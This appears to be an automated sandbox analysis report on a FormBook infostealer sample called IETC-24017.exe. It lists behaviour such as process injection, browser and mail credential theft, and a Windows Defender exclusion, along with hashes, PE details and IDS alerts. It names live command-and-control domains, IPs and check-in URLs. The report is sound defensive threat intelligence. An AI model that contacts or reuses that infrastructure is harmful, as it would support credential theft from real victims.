                      Source: Yara match, File source: 00000003.00000002.1822234803.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000007.00000002.4124625092.00000000046F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000006.00000002.4124804278.0000000004D20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000003.00000002.1824149461.0000000003920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 0.2.IETC-24017.exe.6d90000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 0.2.IETC-24017.exe.371e790.1.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 0.2.IETC-24017.exe.6d90000.3.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 0.2.IETC-24017.exe.371e790.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 00000000.00000002.1692106162.0000000006D90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000000.00000002.1686417175.0000000003701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 312 Process Injection | 11 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                      Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 11 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 312 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                      Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 22 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                      Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Timestomp | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                      IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                      Behavior Graph ID: 1562159, Sample: IETC-24017.exe, Startdate: 25/11/2024, Architecture: WINDOWS, Score: 100

                      Sample-level findings:
                      • Signature: Suricata IDS alerts for network traffic
                      • Signature: Icon mismatch, binary includes an icon from a different legit application in order to fool users
                      • Signature: Multi AV Scanner detection for submitted file
                      • Signature: 8 other signatures
                      • DNS/IP: www.izmirescortg.xyz
                      • DNS/IP: www.amayavp.xyz (Signature: Performs DNS queries to domains with low reputation)
                      • DNS/IP: 15 other IPs or domains

                      Process tree:
                      IETC-24017.exe 4 (started)
                        File dropped: C:\Users\user\AppData\...\IETC-24017.exe.log, ASCII
                        Signature: Adds a directory exclusion to Windows Defender
                        Signature: Injects a PE file into a foreign processes
                        IETC-24017.exe (started)
                          Signature: Maps a DLL or memory area into another process
                          UFUUPGsATdE.exe (injected)
                            DNS/IP: www.amayavp.xyz 185.27.134.144, 49742, 49743, 49744 WILDCARD-ASWildcardUKLimitedGB United Kingdom
                            DNS/IP: www.canadavinreport.site 185.27.134.206, 50044, 50045, 50046 WILDCARD-ASWildcardUKLimitedGB United Kingdom
                            DNS/IP: 12 other IPs or domains
                            Signature: Found direct / indirect Syscall (likely to bypass EDR)
                            openfiles.exe 13 (started)
                              Signature: Tries to steal Mail credentials (via file / registry access)
                              Signature: Tries to harvest and steal browser information (history, passwords, etc)
                              Signature: Modifies the context of a thread in another process (thread injection)
                              Signature: 2 other signatures
                              firefox.exe (started)
                        powershell.exe 23 (started)
                          Signature: Loading BitLocker PowerShell Module
                          WmiPrvSE.exe (started)
                          conhost.exe (started)

                      Source | Detection | Scanner | Label | Link
                      IETC-24017.exe | 42% | ReversingLabs | ByteCode-MSIL.Trojan.Genie |
                      IETC-24017.exe | 100% | Joe Sandbox ML | |
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                                                                                                                                      https://gamesfunny.top$UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000005C44000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.0000000005344000.00000004.10000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4126711874.0000000007630000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2123173632.0000000027544000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.jiyu-kobo.co.jp/IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://code.jquery.com/jquery-3.5.1.min.jsUFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000005C44000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.0000000005344000.00000004.10000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4126711874.0000000007630000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2123173632.0000000027544000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://www.fontbureau.com/designers8IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://js.ad-stir.com/js/adstir.js?20130527UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000006D8A000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.000000000648A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=openfiles.exe, 00000007.00000002.4126876869.0000000007988000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://static.minne.com/files/banner/minne_600x500UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000006D8A000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.000000000648A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://www.galapagosdesign.com/staff/dennis.htmtKIETC-24017.exe, 00000000.00000002.1690156355.0000000005190000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
IP | Domain | Country | ASN | ASN Name | Malicious
209.74.77.108 | www.urbanfashion.website | United States | 31744 | MULTIBAND-NEWHOPEUS | true
212.123.41.108 | www.caj-bioteaque.online | Germany | 12915 | EPAG-ASDE | true
185.27.134.144 | www.amayavp.xyz | United Kingdom | 34119 | WILDCARD-ASWildcardUKLimitedGB | true
163.44.185.183 | www.sankan-fukushi.info | Japan | 7506 | INTERQGMOInternetIncJP | true
172.67.223.206 | www.ssrpidemt-soar.sbs | United States | 13335 | CLOUDFLARENETUS | true
107.167.84.42 | cssa.auction | United States | 53755 | IOFLOODUS | true
104.21.16.206 | www.airrelax.shop | United States | 13335 | CLOUDFLARENETUS | true
206.238.89.119 | www.127358.win | United States | 174 | COGENT-174US | true
217.160.0.200 | carsten.studio | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
161.97.142.144 | www.030002613.xyz | United States | 51167 | CONTABODE | true
43.199.54.158 | www.327531.buzz | Japan | 4249 | LILLY-ASUS | true
185.27.134.206 | www.canadavinreport.site | United Kingdom | 34119 | WILDCARD-ASWildcardUKLimitedGB | true
74.48.143.82 | bpgroup.site | Canada | 14663 | TELUS-3CA | true
172.67.186.192 | www.izmirescortg.xyz | United States | 13335 | CLOUDFLARENETUS | true
                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                Analysis ID:1562159
                                                                                                                                                Start date and time:2024-11-25 09:41:08 +01:00
                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 11m 24s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:full
                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                Number of analysed new started processes analysed:12
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:1
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Sample name:IETC-24017.exe
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@11/7@18/14
                                                                                                                                                EGA Information:
                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                HCA Information:
                                                                                                                                                • Successful, ratio: 92%
                                                                                                                                                • Number of executed functions: 90
                                                                                                                                                • Number of non-executed functions: 284
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                • VT rate limit hit for: IETC-24017.exe
Time | Type | Description
03:41:58 | API Interceptor | 2x Sleep call for process: IETC-24017.exe modified
03:42:01 | API Interceptor | 18x Sleep call for process: powershell.exe modified
03:42:51 | API Interceptor | 10010512x Sleep call for process: openfiles.exe modified
                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                209.74.77.108VSP469620.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • www.urbanxplore.info/chlo/?9HaD=WJ8Pjkl58Iqvi8v+346A7W2JCurCP35uavULUkOWxAdWurHwpVHOzp+Wq3EHGCpSI2RFmnu5nAtTba/o9p0CIyXXw9XhC0V5AfBtSRheiGahxikEfA==&wdv4=1RD4
                                                                                                                                                CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • www.mindfulmo.life/grm8/
                                                                                                                                                Mandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • www.hobbihub.info/i5gf/
                                                                                                                                                CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • www.mindfulmo.life/grm8/
                                                                                                                                                212.123.41.108order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • www.barvingl.online/kqa8/?6LmleBl0=cFpkcfNONqUjMBTzp5cpXnBVfAWhcDIzJVOZSMm9giM6Fyw/9VhImr06LAIYzGnJMes5RjCp2F6lBnm9QzcsoLZzAcibydZloKa433i5tqev&UxyDX=VNL8-ZSx
                                                                                                                                                order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • www.barvingl.online/kqa8/?uJ=cFpkcfNONqUjMBTzp5cpXnBVfAWhcDIzJVOZSMm9giM6Fyw/9VhImr06LAIYzGnJMes5RjCp2F6lBnm9QzcsoIcwEuaW18Akoaa4332kgKev&8z=fhbX
                                                                                                                                                svo0k2D8I1.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • www.barvingl.online/kqa8/?96t8h=cFpkcfNONqUjMBTslZcHXQUURlu1IQQzJVOZSMm9giM6Fyw/9VhImr06LAIYzGnJMes5RjCp2F6lBnm9QzcvloZyAvKo1OlciQ==&knSHc=IHPtK27HtPe
                                                                                                                                                10-2023.xlsx.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • www.cannabis-online-club.com/h98d/?5BtH50=KvtLQh4w1H83c0WibI9Kl3pV24lZ64IQb4SisRJ4OMWuLt1e1z+A+6kuafT+sn2kZrqQySi5S2hvsgUjTVBHdt7anP7qgyU3DT6EkumJFweH&2034-=Trm05BePQnXh
                                                                                                                                                FnhGaHsRol.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • www.elephant-jobs.com/mfz6/?VmhTbl=vc3mRvjcopo&M3=Nh4RiXGq9rirxprZxwngEkCRtuUg03Wk9sPut6Ss0OLP0uwrDSENrdr+PTD7hSRCFu7YxcmD4E3jR7sCfZfUunQrWBvxCOQLEA==
                                                                                                                                                eK7wjZyiSZ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • www.elephant-jobs.com/mfz6/
                                                                                                                                                Purchase_order.vbeGet hashmaliciousFormBook, GuLoader, PlayBrowse
                                                                                                                                                • www.elephant-jobs.com/mfz6/?_Co=QntwWSnq4bm&a_E4inV=Nh4RiXGq9rirxprZwAqoDkeTpuJRiiik9sPut6Ss0OLP0uwrDSENrdv+PTD7hSRCFu7YxcmD4E3jR7sCfZfUnDQddSn0VdgxEQ==
                                                                                                                                                PURCHASE_ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • www.elephant-jobs.com/n65e/?vsc5CQEL=zpix8XPaCaLMbMuJKxLl5xKAf/vHqb+EOSSsuRjy9k3iOcFCF+QQ9dJdWTNAbhWoOF60wuKwrIwmvoIcofYNeJtgTez+3V4dYIfUZ5DrFQ70&BOlc_j=zr9WAC
                                                                                                                                                PUCHASE_INQUIRY_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • www.elephant-jobs.com/n65e/?JBlCXoB=zpix8XPaCaLMbMuJKxLl5xKAf/vHqb+EOSSsuRjy9k3iOcFCF+QQ9dJdWTNAbhWoOF60wuKwrIwmvoIcofYNTuVWZNb+zEQRfw==&ik_E=eSJ0Nu0lvfR1d
                                                                                                                                                Hesap ekstresi.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                No context
                                                                                                                                                No context
                                                                                                                                                Process:C:\Users\user\Desktop\IETC-24017.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1216
                                                                                                                                                Entropy (8bit):5.34331486778365
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2232
                                                                                                                                                Entropy (8bit):5.379828835936797
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:tWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//Zf0Uyus:tLHxvCsIfA2KRHmOugo1s
                                                                                                                                                MD5:9428C7E0853A13FBA7C8F7CF03B3B7A4
                                                                                                                                                SHA1:ADEDDF06890E98ECBB53BFEEE6719517BB49FF0B
                                                                                                                                                SHA-256:0E9C782844A0FF5406890E603F75740D4D31A7728F3CC21BB78B3C2A9B31635B
                                                                                                                                                SHA-512:808278D90B09BF7333ACF6B6A2539855986426AEB33F9FE0D6CF3844361E0C9D7CBAA3D5A2338D6151A497C14EBDD1732AB3278E8B41DB5E321588D6B889AFEF
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Process:C:\Windows\SysWOW64\openfiles.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):114688
                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Entropy (8bit):7.936017984768394
                                                                                                                                                TrID:
                                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                File name:IETC-24017.exe
                                                                                                                                                File size:768'512 bytes
                                                                                                                                                MD5:2d9da996ec68d0ac26b84d52a3298383
                                                                                                                                                SHA1:730f898be0b7296a0b554889567e97eef497b7b6
                                                                                                                                                SHA256:c5523d6938b41d9f2b512ca472f570145539087597f4f31e3e62060e88b03c48
                                                                                                                                                SHA512:79f302dba28e254eac6f1a0bcabaaa5c9aae112fea19d06375e827ed9f7365991fc52c1385c4e8a6dc98aba4de3c0902f1383add704628d75db4d995d821d5fe
                                                                                                                                                SSDEEP:12288:2sMdD3RbeXg2gVUpWoRVW9LQ67JLTNn9VaXHn6NThxO+fkz:2TdD35eXg2gboRVuLQ67HaXn69
                                                                                                                                                TLSH:ACF41252B2A0DF22D27A47B65859928003F965169263E32C4FDEF0DB1FB3F024A61F47
                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................................@................................
                                                                                                                                                Icon Hash:4f050d0d0d054f90
                                                                                                                                                Entrypoint:0x4bbc96
                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                Digitally signed:false
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                Time Stamp:0xA1FAACB2 [Sat Feb 12 05:46:26 2056 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:4
                                                                                                                                                OS Version Minor:0
                                                                                                                                                File Version Major:4
                                                                                                                                                File Version Minor:0
                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                Instruction
                                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbbc41 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xbc000 | 0x1770 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xbe000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb91f0 | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xb9c9c | 0xb9e00 | 3bf31a69d95c4db6be9a23c24d3a20d5 | False | 0.9506083977807667 | data | 7.942883165317064 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xbc000 | 0x1770 | 0x1800 | 735ad023ac646483b563dd9114988266 | False | 0.34423828125 | data | 5.619552021446162 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xbe000 | 0xc | 0x200 | 628eba7e1432c85ab31f4487538649c1 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xbc130 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | | | 0.3079268292682927
RT_GROUP_ICON | 0xbd1d8 | 0x14 | data | | | 1.1
RT_VERSION | 0xbd1ec | 0x398 | OpenPGP Public Key | | | 0.4206521739130435
RT_MANIFEST | 0xbd584 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-25T09:42:30.625653+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49741 | 104.21.16.206 | 80 | TCP
2024-11-25T09:42:48.000735+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49742 | 185.27.134.144 | 80 | TCP
2024-11-25T09:42:50.708449+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49743 | 185.27.134.144 | 80 | TCP
2024-11-25T09:42:53.318751+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49744 | 185.27.134.144 | 80 | TCP
2024-11-25T09:42:56.021633+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49745 | 185.27.134.144 | 80 | TCP
2024-11-25T09:43:03.384367+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49753 | 74.48.143.82 | 80 | TCP
2024-11-25T09:43:06.154691+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49759 | 74.48.143.82 | 80 | TCP
2024-11-25T09:43:08.759106+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49766 | 74.48.143.82 | 80 | TCP
2024-11-25T09:43:11.526224+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49776 | 74.48.143.82 | 80 | TCP
2024-11-25T09:43:19.041365+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49792 | 206.238.89.119 | 80 | TCP
2024-11-25T09:43:21.791205+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49798 | 206.238.89.119 | 80 | TCP
2024-11-25T09:43:24.525641+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49804 | 206.238.89.119 | 80 | TCP
2024-11-25T09:43:27.327256+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49810 | 206.238.89.119 | 80 | TCP
